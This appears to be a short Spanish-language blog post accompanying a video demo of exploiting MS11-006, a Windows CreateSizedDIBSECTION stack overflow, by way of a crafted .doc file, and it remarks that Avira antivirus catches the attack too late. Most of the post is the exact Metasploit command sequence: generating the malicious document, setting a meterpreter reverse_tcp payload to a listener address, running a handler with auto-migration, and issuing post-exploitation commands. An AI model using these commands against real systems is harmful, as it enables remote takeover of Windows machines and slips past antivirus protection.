
En este caso el exploit utilizado en el vídeo se aprovecha de la vulnerabilidad MS11-006 (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) y el payload inyectado es el reverse TCP de meterpreter.
Como podrás comprobar, un antivirus "Avira AntiVir Personal" actualizado detectará el ataque pero tarde, por lo que llegaremos a conseguir la sesión de meterpreter y obtendremos acceso al sistema. Esta condición de carrera parece ser también aplicable a otros productos de Avira como Avira AntiVir Premium y Avira Premium Security Suite.
Los comandos de Metasploit ejecutados son los siguientes:
Para crear el fichero msf.doc para explotar la vulnerabilidad MS11-06:
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
Para escuchar sesiones entrantes de Meterpreter:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j
sysinfo
ipconfig
getpid
ps
0 comentarios :
Publicar un comentario